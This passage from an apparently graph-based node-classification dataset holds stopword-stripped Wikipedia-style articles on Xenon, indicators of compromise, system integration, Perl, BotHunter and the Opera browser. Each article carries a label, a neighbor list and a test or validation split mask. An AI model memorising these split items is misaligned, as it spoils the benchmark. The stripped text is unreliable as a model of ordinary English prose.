    "text": "Xenon_(video_game):xenon video game xenon 1988 vertical scrolling shooter video game first developed bitmap brothers published melbourne house owned mastertronic featured play-by-phone game saturday-morning kids show get fresh xenon followed 1989 according game instruction manual player assumes role darrian future space pilot federation currently war mysterious violent alien species called xenites lasted decade response mayday transmission captain xod following attack trading fleet darrian forced travel xenite occupied territory order support unlike vertically scrolling shooters player craft two modes flying plane ground tank transition crafts initiated almost time play except mid- end-of-level boss sections well certain levels certain mode forced mode chosen depends nature threat player faces destroying enemies released power-ups player could catch enhance ship originally released atari st xenon quickly ported platforms amiga amstrad cpc commodore 64 dos msx zx spectrum arcade machine version game also released mastertronic arcadia division ran commodore amiga hardware xenon almost universally well received launch reviewers magazines covering range platforms scoring game highly german magazine power play bucked trend awarding score 4.5 10",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 8580,
    "label": 4,
    "text": "Indicator_of_compromise:indicator compromise indicator compromise ioc computer forensics artifact observed network operating system high confidence indicates computer intrusion typical iocs virus signatures ip addresses md5 hashes malware files urls domain names botnet command control servers iocs identified via process incident response computer forensics used early detection future attack attempts using intrusion detection systems antivirus software initiatives standardize format iocs efficient automated processing known indicators usually exchanged within industry traffic light protocol used",
    "neighbors": [
      2945,
      1861,
      2213,
      9319,
      7560,
      7210,
      10539,
      10858,
      7983,
      1886,
      4883,
      11198,
      7515,
      5245,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8581,
    "label": 3,
    "text": "System_integration:system integration system integration defined engineering process bringing together component sub-systems one system aggregation subsystems cooperating system able deliver overarching functionality ensuring subsystems function together system information technology process linking together different computing systems software applications physically functionally act coordinated whole system integrator integrates discrete systems utilizing variety techniques computer networking enterprise application integration business process management manual programming system integration involves integrating existing often disparate systems way focuses increasing value customer e.g. improved product quality performance time providing value company e.g. reducing operational costs improving response time modern world connected internet role system integration engineers important systems designed connect within system construction systems already deployed vertical integration opposed horizontal integration process integrating subsystems according functionality creating functional entities also referred silos benefit method integration performed quickly involves necessary vendors therefore method cheaper short term hand cost-of-ownership substantially higher seen methods since case new enhanced functionality possible way implement scale system would implementing another silo reusing subsystems create another functionality possible star integration also known spaghetti integration process systems integration system interconnected remaining subsystems observed perspective subsystem integrated connections reminiscent star overall diagram system presented connections look like spaghetti hence name method cost varies interfaces subsystems exporting case subsystems exporting heterogeneous proprietary interfaces integration cost substantially rise time costs needed integrate systems increase exponentially adding additional subsystems feature perspective method often seems preferable due extreme flexibility reuse functionality horizontal integration enterprise service bus esb integration method specialized subsystem dedicated communication subsystems allows cutting number connections interfaces one per subsystem connect directly esb esb capable translating interface another interface allows cutting costs integration provides extreme flexibility systems integrated using method possible completely replace one subsystem another subsystem provides similar functionality exports different interfaces completely transparent rest subsystems action required implement new interface esb new subsystem horizontal scheme misleading however thought cost intermediate data transformation cost shifting responsibility business logic avoided common data format integration method avoid every adapter convert data to/from every applications formats enterprise application integration eai systems usually stipulate application-independent common data format eai system usually provides data transformation service well help convert application-specific common formats done two steps adapter converts information application format bus common format semantic transformations applied converting zip codes city names splitting/merging objects one application objects applications",
    "neighbors": [
      1952,
      4802,
      2948,
      10603,
      7149,
      9710,
      4591,
      530,
      467,
      11039,
      10301,
      10303
    ],
    "mask": "None"
  },
  {
    "node_id": 8582,
    "label": 9,
    "text": "Perl:perl perl family two high-level general-purpose interpreted dynamic programming languages perl usually refers perl 5 may also refer redesigned sister language perl 6 though perl officially acronym various backronyms use including practical extraction reporting language perl originally developed larry wall 1987 general-purpose unix scripting language make report processing easier since undergone many changes revisions perl 6 began redesign perl 5 2000 eventually evolved separate language languages continue developed independently different development teams liberally borrow ideas one another perl languages borrow features programming languages including c shell script sh awk sed wall also alludes basic lisp introduction learning perl schwartz christiansen provide text processing facilities without arbitrary data-length limits many contemporary unix commandline tools facilitating manipulation text files perl 5 gained widespread popularity late 1990s cgi scripting language part due unsurpassed regular expression string parsing abilities addition cgi perl 5 used system administration network programming finance bioinformatics applications guis nicknamed swiss army chainsaw scripting languages flexibility power also ugliness 1998 also referred duct tape holds internet together reference ubiquitous use glue language perceived inelegance larry wall began work perl 1987 working programmer unisys released version 1.0 comp.sources.misc newsgroup december 18 1987 language expanded rapidly next years perl 2 released 1988 featured better regular expression engine perl 3 released 1989 added support binary data streams originally documentation perl single lengthy man page 1991 programming perl known many perl programmers camel book cover published became de facto reference language time perl version number bumped 4 mark major change language identify version well documented book perl 4 went series maintenance releases culminating perl 4.036 1993 whereupon wall abandoned perl 4 begin work perl 5 initial design perl 5 continued 1994 perl5-porters mailing list established may 1994 coordinate work porting perl 5 different platforms remains primary forum development maintenance porting perl 5 perl 5.000 released october 17 1994 nearly complete rewrite interpreter added many new features language including objects references lexical variables modules importantly modules provided mechanism extending language without modifying interpreter allowed core interpreter stabilize even enabled ordinary perl programmers add new language features perl 5 active development since perl 5.001 released march 13 1995 perl 5.002 released february 29 1996 new prototypes feature allowed module authors make subroutines behaved like perl builtins perl 5.003 released june 25 1996 security release one important events perl 5 history took place outside language proper consequence module support october 26 1995 comprehensive perl archive network cpan established repository perl language perl modules may 2017 carries 185,178 modules 35,190 distributions written 13,071 authors mirrored worldwide 245 locations perl 5.004 released may 15 1997 included among things universal package giving perl base object classes automatically derived ability require versions modules another significant development inclusion cgi.pm module contributed perl popularity cgi scripting language perl 5.004 also added support microsoft windows several operating systems perl 5.005 released july 22 1998 release included several enhancements regex engine new hooks backend codice_1 modules codice_2 regex quote operator large selection new core modules added support several operating systems including beos perl 5.6 released march 22 2000 major changes included 64-bit support unicode string representation support files 2 gib keyword developing perl 5.6 decision made switch versioning scheme one similar open source projects 5.005_63 next version became 5.5.640 plans development versions odd numbers stable versions even numbers 2000 wall put forth call suggestions new version perl community process resulted 361 rfc request comments documents used guiding development perl 6 2001 work began apocalypses perl 6 series documents meant summarize change requests present design next generation perl presented digest rfcs rather formal document point perl 6 existed description language perl 5.8 first released july 18 2002 nearly yearly updates since perl 5.8 improved unicode support added new i/o implementation added new thread implementation improved numeric accuracy added several new modules 2013 version still remains popular version perl used red hat 5 suse 10 solaris 10 hp-ux 11.31 aix 5 2004 work began synopses documents originally summarized apocalypses became specification perl 6 language february 2005 audrey tang began work pugs perl 6 interpreter written haskell first concerted effort towards making perl 6 reality effort stalled 2006 december 18 2007 20th anniversary perl 1.0 perl 5.10.0 released perl 5.10.0 included notable new features brought closer perl 6 included switch statement called given regular expressions updates smart match operator ~~ around time development began earnest another implementation perl 6 known rakudo perl developed tandem parrot virtual machine november 2009 rakudo perl regular monthly releases complete implementation perl 6 major change development process perl 5 occurred perl 5.11 development community switched monthly release cycle development releases yearly schedule stable releases plan bugfix point releases follow stable releases every three months april 12 2010 perl 5.12.0 released notable core enhancements include new codice_3 syntax yada yada operator intended mark placeholder code yet implemented implicit strictures full y2038 compliance regex conversion overloading dtrace support unicode 5.2 january 21 2011 perl 5.12.3 released contains updated modules documentation changes version 5.12.4 released june 20 2011 latest version branch 5.12.5 released november 10 2012 may 14 2011 perl 5.14 released json support built-in 5.14.0 latest version branch 5.14.4 released march 10 2013 may 20 2012 perl 5.16 released notable new features include ability specify given version perl one wishes emulate allowing users upgrade version perl still run old scripts would normally incompatible perl 5.16 also updates core support unicode 6.1 may 18 2013 perl 5.18 released notable new features include new dtrace hooks lexical subs core subs overhaul hash security reasons support unicode 6.2 may 27 2014 perl 5.20 released notable new features include subroutine signatures hash slices/new slice syntax postfix dereferencing experimental unicode 6.3 rand using consistent random number generator observers credit release perl 5.10 start modern perl movement particular phrase describes style development embraces use cpan takes advantage recent developments language rigorous creating high quality code book modern perl may visible standard-bearer idea groups enlightened perl organization taken cause late 2012 2013 several projects alternative implementations perl 5 started perl5 perl6 rakudo perl team moe stevan little friends p2 perl11 team reini urban gperl goccy rperl kickstarter project led braswell affiliated perll11 project ponie acronym perl new internal engine ponie project existed 2003 2006 bridge perl 5 perl 6 effort rewrite perl 5 interpreter run parrot perl 6 virtual machine goal ensure future millions lines perl 5 code thousands companies around world ponie project ended 2006 longer actively developed improvements made perl 5 interpreter part ponie folded project perl originally named pearl wall wanted give language short name positive connotations claims considered every three- four-letter word dictionary also considered naming wife gloria wall discovered existing pearl programming language perl official release changed spelling name referring language name normally capitalized perl proper noun referring interpreter program name often uncapitalized perl unix-like file systems case-sensitive release first edition programming perl common refer language perl randal l. schwartz however capitalized language name book make stand better typeset case distinction subsequently documented canonical name occasionally expanded practical extraction report language backronym expansions suggested equally canonical including wall pathologically eclectic rubbish lister manual page perl indeed wall claims name intended inspire many different expansions programming perl published o'reilly media features picture dromedary camel cover commonly called camel book image camel become unofficial symbol perl well general hacker emblem appearing t-shirts clothing items o'reilly owns image trademark licenses non-commercial use requiring acknowledgement link www.perl.com licensing commercial use decided case case basis o'reilly also provides programming republic perl logos non-commercial sites powered perl buttons site uses perl perl foundation owns alternative symbol onion licenses subsidiaries perl mongers perlmonks perl.org others symbol visual pun pearl onion sebastian riedel creator mojolicious created logo depicting raptor dinosaur available cc-sa license version 4.0 logo remixed used different places symbolising perl 5 analogue raptor comes series talks given matt trout beginning 2010 talks aimed perl 5 community-centric period perl 6 hot topic according wall perl two slogans first one way commonly known tmtowtdi second slogan easy things easy hard things possible overall structure perl derives broadly c. perl procedural nature variables expressions assignment statements brace-delimited blocks control structures subroutines perl also takes features shell programming variables marked leading sigils allow variables interpolated directly strings however unlike shell perl uses sigils accesses variables unlike programming languages use sigils sigil n't denote type variable type expression example access list values hash sigil array used sigil hash perl also many built-in functions provide tools often used shell programming although many tools implemented programs external shell sorting calling operating system facilities perl takes lists lisp hashes associative arrays awk regular expressions sed simplify facilitate many parsing text-handling data-management tasks also shared lisp implicit return last value block fact statements value thus also expressions used larger expressions perl 5 added features support complex data structures first-class functions closures values object-oriented programming model include references packages class-based method dispatch lexically scoped variables along compiler directives example codice_4 pragma major additional feature introduced perl 5 ability package code reusable modules wall later stated whole intent perl 5 module system encourage growth perl culture rather perl core versions perl automatic data-typing automatic memory management interpreter knows type storage requirements every data object program allocates frees storage necessary using reference counting deallocate circular data structures without manual intervention legal type conversions — example conversions number string — done automatically run time illegal type conversions fatal errors design perl understood response three broad trends computer industry falling hardware costs rising labor costs improvements compiler technology many earlier computer languages fortran c aimed make efficient use expensive computer hardware contrast perl designed computer programmers could write programs quickly easily perl many features ease task programmer expense greater cpu memory requirements include automatic memory management dynamic typing strings lists hashes regular expressions introspection codice_5 function perl follows theory built-in limits idea similar zero one infinity rule wall trained linguist design perl much informed linguistic principles examples include huffman coding common constructions short good end-weighting important information come first large collection language primitives perl favors language constructs concise natural humans write even complicate perl interpreter perl syntax reflects idea things different look different example scalars arrays hashes different leading sigils array indices hash keys use different kinds braces strings regular expressions different standard delimiters approach contrasted language lisp basic syntax composed simple universal symbolic expressions used purposes perl enforce particular programming paradigm procedural object-oriented functional others even require programmer choose among broad practical bent perl language community culture surround preface programming perl begins perl language getting job done one consequence perl tidy language includes many features tolerates exceptions rules employs heuristics resolve syntactical ambiguities forgiving nature compiler bugs sometimes hard find perl function documentation remarks variant behavior built-in functions list scalar contexts saying general want unless want consistency written specification standard perl language exists perl versions perl 5 plans create one current version perl one implementation interpreter language evolved along interpreter together functional tests stands de facto specification language perl 6 however started specification several projects aim implement specification perl many varied applications compounded availability many standard third-party modules perl chiefly used write cgi scripts large projects written perl include cpanel slash bugzilla rt twiki movable type high-traffic websites use perl extensively include priceline.com craigslist imdb livejournal duckduckgo slashdot ticketmaster also optional component popular lamp technology stack web development lieu php python perl used extensively system programming language debian gnu/linux distribution perl often used glue language tying together systems interfaces specifically designed interoperate data munging converting processing large amounts data tasks creating reports fact strengths intimately linked combination makes perl popular all-purpose language system administrators particularly short programs often called one-liner programs entered run single command line perl code made portable across windows unix code often used suppliers software cots bespoke simplify packaging maintenance software build- deployment-scripts graphical user interfaces guis may developed using perl example perl/tk wxperl commonly used enable user interaction perl scripts interaction may synchronous asynchronous using callbacks update gui perl implemented core interpreter written c together large collection modules written perl c. interpreter 150,000 lines c code compiles 1 mb executable typical machine architectures alternatively interpreter compiled link library embedded programs nearly 500 modules distribution comprising 200,000 lines perl additional 350,000 lines c code much c code modules consists character encoding tables interpreter object-oriented architecture elements perl language—scalars arrays hashes coderefs file handles—are represented interpreter c structs operations structs defined large collection macros typedefs functions constitute perl c api perl api bewildering uninitiated entry points follow consistent naming scheme provides guidance use life perl interpreter divides broadly compile phase run phase perl phases major stages interpreter life-cycle interpreter goes phase phases follow fixed sequence happens perl compile phase compilation happens perl run phase execution significant exceptions perl makes important use capability execute perl code compile phase perl also delay compilation run phase terms indicate kind processing actually occurring moment compile time run time perl compile time points compile phase compile time may also entered run phase compile time code string argument passed codice_6 built-in occurs run phase perl often run time compile phase spends run phase run time code codice_7 blocks executes run time compile phase compile time interpreter parses perl code syntax tree run time executes program walking tree text parsed syntax tree subject optimization executed execution relatively efficient compile-time optimizations syntax tree include constant folding context propagation peephole optimization also performed perl turing-complete grammar parsing affected run-time code executed compile phase therefore perl parsed straight lex/yacc lexer/parser combination instead interpreter implements lexer coordinates modified gnu bison parser resolve ambiguities language often said perl parse perl meaning perl interpreter codice_8 parse perl language perl even general true perl interpreter simulate turing machine compile phase would need decide halting problem order complete parsing every case long-standing result halting problem undecidable therefore even perl always parse perl perl makes unusual choice giving user access full programming power compile phase cost terms theoretical purity high practical inconvenience seems rare programs undertake parse perl source-code analyzers auto-indenters contend ambiguous syntactic constructs also undecidability perl parsing general case adam kennedy ppi project focused parsing perl code document retaining integrity document instead parsing perl executable code even perl always kennedy first conjectured parsing perl suffers 'halting problem later proved perl distributed 250,000 functional tests core perl language 250,000 functional tests core modules run part normal build process extensively exercise interpreter core modules perl developers rely functional tests ensure changes interpreter introduce software bugs additionally perl users see interpreter passes functional tests system high degree confidence working properly perl dual licensed artistic license 1.0 gnu general public license distributions available operating systems particularly prevalent unix unix-like systems ported modern many obsolete platforms six reported exceptions perl compiled source code posix-compliant otherwise-unix-compatible platforms unusual changes required classic mac os environment special port called macperl shipped independently comprehensive perl archive network carries complete list supported platforms links distributions available cpan also source publicly available perl modules part core perl distribution users microsoft windows typically install one native binary distributions perl win32 commonly strawberry perl activeperl compiling perl source code windows possible installations lack requisite c compiler build tools also makes difficult install modules cpan particularly partially written c. activeperl closed source distribution activestate regular releases track core perl releases distribution also includes perl package manager ppm popular tool installing removing upgrading managing use common perl modules included also perlscript windows script host wsh engine implementing perl language visual perl activestate tool adds perl visual studio .net development suite vbscript perl converter well perl compiler windows converters awk sed perl also produced company included activestate cd windows includes distributions plus komodo ide first unix/linux/posix variant thereof 2002 subsequently strawberry perl open source distribution windows regular quarterly releases since january 2008 including new modules feedback requests come strawberry perl aims able install modules like standard perl distributions platforms including compiling xs modules cygwin emulation layer another way running perl windows cygwin provides unix-like environment windows perl cpan available standard pre-compiled packages cygwin setup program since cygwin also includes gcc compiling perl source also possible perl executable included several windows resource kits directory scripting tools implementations perl come mks toolkit interix base earlier implementations windows services unix uwin perl text-handling capabilities used generating sql queries arrays hashes automatic memory management make easy collect process returned data example tim bunce perl dbi application programming interface api arguments api text sql queries thus possible program multiple languages time e.g. generating web page using html javascript sql document use perl variable interpolation programmatically customize sql queries specification perl arrays hashes structures programmatically hold resulting data sets sql query allows high-level mechanism handling large amounts data post-processing perl subprogram early versions perl database interfaces created relinking interpreter client-side database library sufficiently difficult done most-important widely used databases restricted resulting codice_8 executable using one database interface time perl 5 database interfaces implemented perl dbi modules dbi database interface module presents single database-independent interface perl applications dbd database driver modules handle details accessing 50 different databases dbd drivers ansi sql databases dbi provides caching database handles queries greatly improve performance long-lived execution environments mod perl helping high-volume systems avert load spikes slashdot effect modern perl applications especially written using web frameworks catalyst dbi module often used indirectly via object-relational mappers generate sql queries handle data transparently application author computer language benchmarks game compares performance implementations typical programming problems several programming languages submitted perl implementations typically perform toward high end memory-usage spectrum give varied speed results perl performance benchmarks game typical interpreted languages large perl programs start slowly similar programs compiled languages perl compile source every time runs talk yapc :europe 2005 conference subsequent article timely start jean-louis leroy found perl programs took much longer run expected perl interpreter spent significant time finding modules within over-large include path unlike java python ruby perl experimental support pre-compiling therefore perl programs pay overhead penalty every execution run phase typical programs long enough amortized startup time substantial benchmarks measure short execution times likely skewed due overhead number tools introduced improve situation first tool apache mod perl sought address one most-common reasons small perl programs invoked rapidly cgi web development activeperl via microsoft isapi provides similar performance improvements perl code compiled additional overhead execution phase typically n't present programs written compiled languages c c++ examples overhead include bytecode interpretation reference-counting memory management dynamic type-checking perl interpreted language give problems efficiency critical situations critical routines written languages c connected perl via simple inline modules complex flexible xs mechanism perl 5 language usually referred perl continues actively developed perl 5.12.0 released april 2010 new features influenced design perl 6 followed perl 5.14.1 released june 17 2011 perl 5.16.1 released august 9 2012 perl 5.18.0 released may 18 2013 perl 5 development versions released monthly basis major releases coming per year relative proportion internet searches perl programming compared similar searches programming languages steadily declined 10 2005 2 2011 1 2019 2000 perl conference jon orwant made case major new language-initiative led decision begin work redesign language called perl 6 proposals new language features solicited perl community large submitted 300 rfcs wall spent next years digesting rfcs synthesizing coherent framework perl 6 presented design perl 6 series documents called apocalypses numbered correspond chapters programming perl developing specification perl 6 encapsulated design documents called synopsesnumbered correspond apocalypses thesis work bradley m. kuhn overseen wall considered possible use java virtual machine runtime perl kuhn thesis showed approach problematic 2001 decided perl 6 would run cross-language virtual machine called parrot mean languages targeting parrot gain native access cpan allowing level cross-language development 2005 audrey tang created pugs project implementation perl 6 haskell acted continues act test platform perl 6 language separate development actual implementation allowing language designers explore pugs project spawned active perl/haskell cross-language community centered around freenode perl6 irc channel many functional programming influences absorbed perl 6 design team 2012 perl 6 development centered primarily around two compilers 2013 moarvm “ metamodel runtime ” c language-based virtual machine designed primarily rakudo announced rakudo perl implementation moarvm support virtual machines java virtual machine javascript active development perl culture community developed alongside language usenet first public venue perl introduced course evolution perl community shaped growth broadening internet-based services including introduction world wide web community surrounds perl fact topic wall first state onion talk state onion name wall yearly keynote-style summaries progress perl community characterized hallmark humor employing references perl culture wider hacker culture wall linguistic background sometimes family life occasionally even christian background talk first given various perl conferences eventually also published online number irc channels offer support language modules also many examples code written purely entertainment cpan codice_10 example allows writing programs latin upon execution program module translates source code regular perl runs perl community set aside acme namespace modules fun nature scope widened include exploratory experimental code module meant ever used production acme modules deliberately implemented amusing ways includes codice_11 one first modules codice_12 namespace allows program source code whitened i.e. characters replaced whitespace yet still work older versions perl one would write hello world program complex perl program counts seconds given threshold perl interpreter also used one-off scripts command line following example invoked sh-compatible shell bash translates string bob files ending .txt current directory robert perl referred line noise programmers claim syntax makes write-only language earliest mention first edition book learning perl perl 4 tutorial book written randal l. schwartz first chapter states yes sometimes perl looks like line noise uninitiated seasoned perl programmer looks like checksummed line noise mission life also stated accusation perl write-only language could avoided coding proper care perl overview document perlintro states names built-in magic scalar variables look like punctuation line noise however english module provides long short english alternatives perlstyle document states line noise regular expressions could mitigated using codice_13 modifier add whitespace according perl 6 faq perl 6 designed mitigate usual suspects elicit line noise claim perl 5 critics including removal majority punctuation variables sanitization regex syntax perl 6 faq also states sometimes referred perl line noise actual syntax language gerunds prepositions part english language december 2012 blog posting despite claiming rakudo perl 6 failed continue fail unless gets adult supervision chromatic stated design perl 6 well-defined grammar well improved type system unified object system intelligent metamodel metaoperators clearer system context provides niceties pervasive laziness also stated perl 6 coherence consistency perl 5 lacks",
    "neighbors": [
      6145,
      8201,
      2060,
      8204,
      2062,
      6160,
      10258,
      8213,
      10266,
      8221,
      6176,
      10276,
      8236,
      8240,
      10292,
      58,
      10308,
      8262,
      8266,
      6219,
      84,
      6228,
      6241,
      8289,
      10340,
      102,
      8297,
      8303,
      8304,
      119,
      2181,
      10387,
      148,
      155,
      8347,
      4255,
      2217,
      6313,
      10413,
      6333,
      190,
      6335,
      8385,
      10435,
      8388,
      4294,
      6345,
      2259,
      6361,
      228,
      10470,
      231,
      2281,
      10478,
      8447,
      2304,
      263,
      10506,
      10510,
      10511,
      8473,
      8476,
      10526,
      2336,
      4398,
      2364,
      10565,
      8520,
      10569,
      8524,
      2387,
      10584,
      10586,
      8539,
      348,
      6493,
      2401,
      8549,
      6502,
      8554,
      8558,
      6523,
      6536,
      6555,
      412,
      10654,
      416,
      8611,
      8618,
      428,
      6574,
      2481,
      4529,
      2485,
      8631,
      2494,
      8644,
      6597,
      4550,
      6606,
      463,
      2519,
      477,
      6625,
      482,
      8683,
      10732,
      493,
      10736,
      8691,
      2548,
      502,
      2556,
      2557,
      8702,
      515,
      516,
      6671,
      2576,
      6680,
      541,
      546,
      8738,
      8739,
      2603,
      4658,
      2617,
      2621,
      6718,
      576,
      2627,
      8771,
      10819,
      8775,
      10824,
      595,
      8791,
      10841,
      2658,
      10851,
      10854,
      10857,
      4725,
      6797,
      655,
      10900,
      2710,
      8854,
      4770,
      6822,
      2727,
      4775,
      4777,
      8873,
      10921,
      6828,
      8883,
      692,
      10939,
      6847,
      711,
      8909,
      10964,
      4822,
      6871,
      6875,
      10971,
      741,
      4840,
      8941,
      10991,
      4850,
      10994,
      6910,
      788,
      797,
      6941,
      8990,
      2853,
      806,
      807,
      2864,
      9014,
      823,
      4919,
      6973,
      2880,
      6982,
      847,
      2903,
      11098,
      863,
      865,
      9063,
      7022,
      7027,
      9078,
      2936,
      4997,
      4998,
      908,
      11161,
      7067,
      929,
      7076,
      5032,
      9128,
      5050,
      963,
      5059,
      5067,
      11219,
      9177,
      7135,
      7139,
      5093,
      5096,
      7144,
      9193,
      7147,
      1016,
      11259,
      9216,
      3076,
      11269,
      9224,
      11278,
      5139,
      3099,
      9245,
      11307,
      3147,
      1101,
      3159,
      7256,
      5209,
      11351,
      1116,
      5214,
      9320,
      1130,
      7274,
      11371,
      9325,
      3182,
      9330,
      3191,
      7292,
      7293,
      1152,
      5249,
      9345,
      5251,
      5253,
      3206,
      5255,
      9360,
      7326,
      1185,
      9385,
      11434,
      11442,
      1203,
      7347,
      1211,
      5330,
      5334,
      1244,
      11490,
      11492,
      7398,
      5357,
      9455,
      11506,
      9467,
      1277,
      5383,
      7435,
      9487,
      9490,
      5395,
      9491,
      5397,
      3350,
      5399,
      1304,
      11541,
      11552,
      5415,
      9519,
      1332,
      9527,
      1343,
      7487,
      1347,
      1348,
      1353,
      7500,
      1358,
      9557,
      11610,
      7518,
      1379,
      9579,
      1394,
      5492,
      7540,
      3462,
      1419,
      9614,
      5521,
      5524,
      1429,
      11674,
      1435,
      7580,
      3487,
      11683,
      5546,
      11693,
      3506,
      1459,
      7611,
      9666,
      9671,
      7627,
      7629,
      5588,
      9687,
      9701,
      5612,
      9714,
      7675,
      5634,
      5635,
      9735,
      1556,
      1565,
      5677,
      3631,
      7728,
      1586,
      5684,
      9780,
      1591,
      1594,
      3642,
      1611,
      9808,
      7761,
      3667,
      7764,
      3675,
      5723,
      1632,
      9828,
      5737,
      5743,
      9839,
      9843,
      1652,
      1655,
      9848,
      3705,
      5754,
      7805,
      1666,
      1673,
      9871,
      9875,
      5783,
      3744,
      5819,
      9926,
      5833,
      7889,
      7894,
      1771,
      9964,
      1775,
      5872,
      5874,
      3837,
      1801,
      1812,
      1813,
      5911,
      5917,
      10013,
      3876,
      1837,
      7983,
      7987,
      5945,
      8000,
      1859,
      3907,
      3908,
      5961,
      10060,
      3918,
      3937,
      3942,
      3960,
      8057,
      1920,
      3969,
      6016,
      8068,
      8082,
      3988,
      3990,
      1943,
      10143,
      1952,
      1960,
      4020,
      4024,
      6074,
      4033,
      8132,
      4042,
      8147,
      4053,
      4056,
      4057,
      2010,
      4069,
      6119,
      8171,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8583,
    "label": 4,
    "text": "BotHunter:bothunter bothunter free utility unix aims detecting botnet activity within network analyzing network traffic comparing patterns characteristic malicious processes version 1.7.2 current earlier version ran microsoft windows xp mentioned web site release 1.7.2 order support application developer sri international collected 10,000 samples malware 2008 bothunter web site states software made possible part research grant u.s. army research office",
    "neighbors": [
      4883,
      5492
    ],
    "mask": "None"
  },
  {
    "node_id": 8584,
    "label": 5,
    "text": "Opera_(web_browser):opera web browser opera web browser microsoft windows android ios macos linux operating systems developed opera software opera software norwegian software company publicly listed nasdaq stock exchange majority ownership control belonging chinese businessman zhou yahui founder beijing kunlun tech specialises mobile games chinese cybersecurity company qihoo 360 opera chromium-based browser using blink layout engine differentiates distinct user interface features opera conceived telenor research project 1994 bought opera software 1995 commercial software first ten years proprietary presto layout engine presto versions opera received many awards presto development ended milestone transition chromium 2013 also three mobile versions called opera mobile opera touch opera mini gaming browser called opera gx launched 11 june 2019 opera began 1994 research project telenor largest norwegian telecommunications company 1995 branched separate company named opera software opera first publicly released 1996 version 2.10 ran microsoft windows attempt capitalize emerging market internet-connected handheld devices project port opera mobile device platforms started 1998 opera 4.0 released 2000 included new cross-platform core facilitated creation editions opera multiple operating systems platforms point opera trialware purchased trial period ended version 5.0 released 2000 saw end requirement instead opera became ad-sponsored displaying advertisements users paid later versions opera gave user choice seeing banner ads targeted text advertisements google version 8.5 released 2005 advertisements completely removed primary financial support browser came revenue google contract opera default search engine among new features introduced version 9.1 released 2006 fraud protection using technology geotrust digital certificate provider phishtank organization tracks known phishing web sites feature improved expanded version 9.5 geotrust replaced netcraft malware protection haute secure added 2006 opera software asa released well internet channel nintendo ds browser nintendo ds wii gaming systems new javascript engine called carakan javanese alphabet introduced version 10.50 according opera software carakan made opera 10.50 seven times faster sunspider opera 10.10 16th december 2010 opera 11 released featuring extensions tab stacking dragging one tab another allows create group tabs visual mouse gestures changes address bar opera 12 released 14 june 2012 12 february 2013 opera software announced would drop presto layout engine favour webkit implemented google chrome browser using code chromium project opera software planned well contribute code webkit 3 april 2013 google announced would fork components webkit form new layout engine known blink day opera software confirmed would follow google implementing blink layout engine 28 may 2013 beta release opera 15 made available first version based chromium project many distinctive opera features previous versions dropped opera mail separated standalone application derived opera 12 november 2016 original norwegian owner opera sold stake business chinese consortium name golden brick capital private equity fund limited partnership 600 million earlier deal approved regulators january 2017 source code opera 12.15 one last versions still based presto layout engine leaked demonstrate radically different browser could look opera neon dubbed concept browser released january 2017 pc world compared demo models automakers hardware vendors release show visions future instead speed dial also explained following chapter features displays frequently accessed websites resemblance desktop computer icons scattered artistic formation opera originated features later adopted web browsers including speed dial pop-up blocking re-opening recently closed pages private browsing tabbed browsing opera includes bookmarks bar download manager opera also speed dial allows user add unlimited number pages shown thumbnail form page displayed new tab opened speed dial allows user easily navigate selected web pages possible control aspects browser using keyboard shortcuts page zooming allows text images content adobe flash player java platform scalable vector graphics increased decreased size help impaired vision opera software claims opera turbo mode enabled compression servers compress requested web pages except https pages 50 depending upon content sending users process reduces amount data transferred particularly useful crowded slow network connections making web pages load faster costs dependent total amount data usage technique also used opera mini mobile devices smartwatches one security feature option delete private data http cookies browsing history items cache passwords click button lets users erase personal data browsing shared computer visiting site opera displays security badge address bar shows details website including security certificates opera fraud malware protection warns suspicious web pages enabled default checks requested page several databases known phishing malware websites called blacklists january 2007 asa dotzler competing mozilla corporation accused opera software downplaying information security vulnerabilities opera fixed december 2006 dotzler claimed users clearly informed security vulnerabilities present previous version opera thus would realize needed upgrade latest version else risk exploited hackers opera software responded accusations next day 2016 free virtual private network vpn service implemented browser opera said would allow encrypted access websites otherwise blocked provide security public wifi networks either vpn turbo enabled july 2018 opera listed nasdaq stock exchange new york city initial offering 12 per share 2018 built-in cryptocurrency wallet opera web browser released announcing would first browser built-in crypto wallet 13 december 2018 released video showing many decentralized applications like cryptokitties running android version opera web browser opera one first browsers support cascading style sheets css opera software uses release cycle consisting three streams correspond phases development downloaded installed independently developer beta stable new features first introduced developer build depending user feedback may progress beta version eventually released developer stream allows early testing new features mainly targeting developers extension creators early adopters opera developer intended everyday browsing unstable prone failure crashing enables advanced users try new features still development without affecting normal installation browser new versions browser released frequently generally times week beta stream formerly known opera next feature complete package allowing stability quality mature final release new version released every couple weeks streams installed alongside official release without interference different icon help user distinguish variants 2005 adobe systems opted integrate opera rendering engine presto adobe creative suite applications opera technology employed adobe golive adobe photoshop adobe dreamweaver components adobe creative suite opera layout engine also found virtual mechanics sitespinner pro internet channel version opera 9 web browser use nintendo wii created opera software nintendo opera software also implemented nintendo ds browser nintendo handheld systems versions presto layout engine positively reviewed although criticized website compatibility issues issue opera 8.01 higher included workarounds help certain popular problematic web sites display properly versions blink layout engine criticized users missing features ui customization abandoning opera software presto layout engine despite versions blink layout engine praised fast stable handling latest web standards better website compatibility modern-style user interface years opera personal computers received several awards awards include related web browsers web browsers essential features",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      2076,
      7708,
      1054,
      9757,
      7713,
      10791,
      9768,
      9770,
      1067,
      559,
      3634,
      2611,
      4661,
      3639,
      7736,
      10808,
      9786,
      3643,
      2108,
      9275,
      64,
      9281,
      3657,
      2635,
      5707,
      9803,
      5199,
      10831,
      11345,
      10834,
      5205,
      6231,
      8281,
      2139,
      5724,
      6237,
      6747,
      7771,
      1121,
      6241,
      4198,
      1642,
      9834,
      9841,
      4722,
      115,
      1139,
      5749,
      9843,
      119,
      4728,
      2169,
      637,
      1664,
      2182,
      6797,
      8854,
      11418,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      7362,
      7364,
      11466,
      7885,
      11469,
      9424,
      10450,
      4310,
      4822,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      5869,
      9451,
      11000,
      6393,
      8443,
      9987,
      7943,
      1802,
      4364,
      1807,
      278,
      790,
      1302,
      3350,
      7965,
      1318,
      11559,
      1834,
      7983,
      11060,
      823,
      2880,
      7488,
      10057,
      11082,
      2893,
      3407,
      339,
      10071,
      7515,
      3428,
      10599,
      11112,
      877,
      8557,
      378,
      6528,
      1409,
      3971,
